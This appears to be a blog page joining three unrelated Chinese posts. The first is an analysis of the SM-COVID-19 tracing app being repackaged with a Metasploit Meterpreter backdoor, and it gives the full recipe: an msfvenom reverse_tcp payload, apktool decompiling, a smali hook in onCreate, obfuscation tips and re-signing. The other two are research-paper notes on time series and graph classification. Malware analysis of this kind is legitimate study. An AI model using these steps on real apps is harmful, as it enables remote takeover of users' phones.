Contents

安卓木马分析:被感染的SM-COVID-19应用

SM-COVID-19是意大利公司SoftMining开发的APP,用于追踪病毒的接触轨迹。该应用被恶意软件开发者重打包,嵌入了MSF(Metasploit Framework 渗透测试框架)的Meterpreter后门

攻击概述

攻击步骤

  1. 确定良性的载荷APK(SM-COVID-19

  2. 使用MSF的msfvenom工具生成恶意负载APK(Metasploit APK)

    $ msfvenom -p android/meterpreter/reverse_tcp LHOST=<url> # Remote Server IP
    
  3. 反编译载荷APK和负载APK

    $ apktool d xxx.apk # use Apktool to decompile
    
  4. 将Metasploit APK中Meterpreter的smali代码复制到载荷APK的smali目录下

  5. 增加触发恶意代码的方法,即注入钩子(Hook)。例如,在入口点(即AndroidManifest.xml中包含intent-filter<action android:name="android.intent.action.MAIN"/> 的activity)的smali代码中定位onCreate()方法,并在方法的起始位置添加一行smali代码:

    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    

    注:若要混淆com/metasploit/stage/Payload,还需修改Payload目录下所有此路径的引用,并改变其自身的目录名。

  6. 将Metasploit APK的Manifest文件中的uses-permission(权限)和uses-feature(软硬件依赖)等补充到新APK的Manifest文件中

  7. 打包新的APK

    $ apktool b xxx.apk
    
  8. 重新签名

    $ keytool -genkey -v -keystore <sig>.keystore -alias <sig> # java工具生成自签名keystore
    $ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore <sig>.keystore xxx.apk <sig> # 使用keystore签名APK
    

Contents

Time2Graph: Revisiting Time Series Modeling with Dynamic Shapelets

image-20201215094240029

源代码:https://github.com/petecheng/Time2Graph

研究问题

时间序列建模

常用Shapelet(时间序列中最具有辨别性的子序列)方法;每一个Shapelet会在时序中找到最匹配的位置,以及匹配程度。现有工作忽视的问题(以窃电检测为例):

  1. 出现在不同时间位置的同一个Shapelet可能有不同的含义(冬夏季的低电耗比春季可疑)
  2. Shapelet的前后演化关系对于全面理解时间序列十分重要(部分正常用户全年耗电量低)

Preliminaries

一个时间序列数据\(t\),可表示为\(n\)个按时间顺序排列的元素\(\{x_1,\cdots ,x_n\}\),则子序列可记作\(s=\{x_i,\cdots ,x_j\}\)。 将\(t\)划分为\(m\)个长度为\(l\)的时间段,则又可记作\(\{s_1, \cdots ,s_m\}=\{\{x_{l*k+1},\cdots ,x_{l*k+l}\}\vert 0\leq k\leq m-1\}\)。

Contents

Semi-Supervised Graph Classification: A Hierarchical Graph Perspective

image-20201211112621071

研究问题

层次图上的半监督(图)节点分类。以下图为例,社交网络表示为一个“层次图”,其上的节点(用户组A,B,C,D)也是“图实例”;在每个表示用户组的图实例中,各节点表示一个用户,具有年龄、性别等属性;在(层次图、图实例)结构一定,已知部分(用户组)节点标签的情况下,对未知节点(C,D)进行分类。

image-20201211113824573